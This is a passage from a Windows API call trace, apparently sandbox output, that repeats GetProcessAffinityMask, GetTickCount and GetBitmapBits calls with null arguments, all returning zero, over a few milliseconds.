lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.512] GetTickCount () returned 0x2029229 [0247.512] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.512] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.512] GetTickCount () returned 0x2029229 [0247.512] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.512] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.513] GetTickCount () returned 0x2029229 [0247.513] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.513] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.513] GetTickCount () returned 0x2029229 [0247.513] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.513] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.513] GetTickCount () returned 0x2029229 [0247.513] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.513] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.513] GetTickCount () returned 0x2029229 [0247.513] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.513] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.513] GetTickCount () returned 0x2029229 [0247.513] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.513] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.514] GetTickCount () returned 0x2029229 [0247.514] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.514] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.514] GetTickCount () returned 0x2029229 [0247.514] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.514] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.514] GetTickCount () returned 0x2029229 [0247.514] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.514] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.514] GetTickCount () returned 0x2029229 [0247.514] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.514] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.514] GetTickCount () returned 0x2029229 [0247.514] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.514] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.514] GetTickCount () returned 0x2029229 [0247.514] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.514] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.514] GetTickCount () returned 0x2029229 [0247.514] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.515] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.515] GetTickCount () returned 0x2029229 [0247.515] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.515] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.515] GetTickCount () returned 0x2029229 [0247.515] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.515] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.515] GetTickCount () returned 0x2029229 [0247.515] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.515] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.515] GetTickCount () returned 0x2029229 [0247.515] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.515] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.515] GetTickCount () returned 0x2029229 [0247.515] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.515] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.515] GetTickCount () returned 0x2029229 [0247.515] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.516] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.516] GetTickCount () returned 0x2029229 [0247.516] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.516] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.516] GetTickCount () returned 0x2029229 [0247.516] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.516] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.516] GetTickCount () returned 0x2029229 [0247.516] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.516] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.516] GetTickCount () returned 0x2029229 [0247.516] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.516] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.516] GetTickCount () returned 0x2029229 [0247.516] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.516] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.516] GetTickCount () returned 0x2029229 [0247.516] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.517] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.517] GetTickCount () returned 0x2029229 [0247.517] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.517] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.517] GetTickCount () returned 0x2029229 [0247.517] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.517] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.517] GetTickCount () returned 0x2029229 [0247.517] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.517] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.517] GetTickCount () returned 0x2029229 [0247.517] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.517] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.517] GetTickCount () returned 0x2029229 [0247.517] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.517] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.517] GetTickCount () returned 0x2029229 [0247.517] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.517] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.518] GetTickCount () returned 0x2029229 [0247.518] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.518] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.518] GetTickCount () returned 0x2029229 [0247.518] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.518] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.518] GetTickCount () returned 0x2029229 [0247.518] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.518] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.518] GetTickCount () returned 0x2029229 [0247.518] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.518] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.518] GetTickCount () returned 0x2029229 [0247.518] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.518] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.518] GetTickCount () returned 0x2029229 [0247.518] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.518] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.518] GetTickCount () returned 0x2029229 [0247.519] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.519] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.519] GetTickCount () returned 0x2029229 [0247.519] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.519] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.519] GetTickCount () returned 0x2029229 [0247.519] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.519] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.519] GetTickCount () returned 0x2029229 [0247.519] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.519] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.519] GetTickCount () returned 0x2029229 [0247.519] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.519] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.519] GetTickCount () returned 0x2029229 [0247.519] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.519] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.519] GetTickCount () returned 0x2029229 [0247.519] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.520] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.520] GetTickCount () returned 0x2029229 [0247.520] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.520] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.520] GetTickCount () returned 0x2029229 [0247.520] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.520] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.520] GetTickCount () returned 0x2029229 [0247.520] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.520] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.520] GetTickCount () returned 0x2029229 [0247.520] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.520] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.520] GetTickCount () returned 0x2029229 [0247.520] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.520] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.520] GetTickCount () returned 0x2029229 [0247.520] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.521] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.521] GetTickCount () returned 0x2029229 [0247.521] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.521] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.521] GetTickCount () returned 0x2029229 [0247.521] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.521] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.521] GetTickCount () returned 0x2029229 [0247.521] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.521] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.521] GetTickCount () returned 0x2029229 [0247.521] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.521] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.521] GetTickCount () returned 0x2029229 [0247.521] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.521] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.522] GetTickCount () returned 0x2029229 [0247.522] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.522] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.522] GetTickCount () returned 0x2029229 [0247.522] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.522] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.522] GetTickCount () returned 0x2029229 [0247.522] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.522] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.522] GetTickCount () returned 0x2029239 [0247.522] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.522] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.522] GetTickCount () returned 0x2029239 [0247.522] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.522] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.522] GetTickCount () returned 0x2029239 [0247.522] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.523] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.523] GetTickCount () returned 0x2029239 [0247.523] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.523] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.523] GetTickCount () returned 0x2029239 [0247.523] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.523] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.523] GetTickCount () returned 0x2029239 [0247.523] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.523] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.523] GetTickCount () returned 0x2029239 [0247.523] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.523] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.523] GetTickCount () returned 0x2029239 [0247.523] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.523] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.524] GetTickCount () returned 0x2029239 [0247.524] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.524] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.524] GetTickCount () returned 0x2029239 [0247.524] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.524] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.524] GetTickCount () returned 0x2029239 [0247.524] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.524] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.524] GetTickCount () returned 0x2029239 [0247.524] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.524] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.524] GetTickCount () returned 0x2029239 [0247.524] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.524] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.524] GetTickCount () returned 0x2029239 [0247.524] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.524] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.524] GetTickCount () returned 0x2029239 [0247.524] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.524] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.524] GetTickCount () returned 0x2029239 [0247.524] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.524] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.525] GetTickCount () returned 0x2029239 [0247.525] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.525] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.525] GetTickCount () returned 0x2029239 [0247.525] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.525] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.525] GetTickCount () returned 0x2029239 [0247.525] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.525] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.525] GetTickCount () returned 0x2029239 [0247.525] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.525] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.525] GetTickCount () returned 0x2029239 [0247.525] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.525] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.525] GetTickCount () returned 0x2029239 [0247.525] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.525] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.525] GetTickCount () returned 0x2029239 [0247.525] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.525] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.525] GetTickCount () returned 0x2029239 [0247.525] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.525] GetProcessAffinityMask (in: 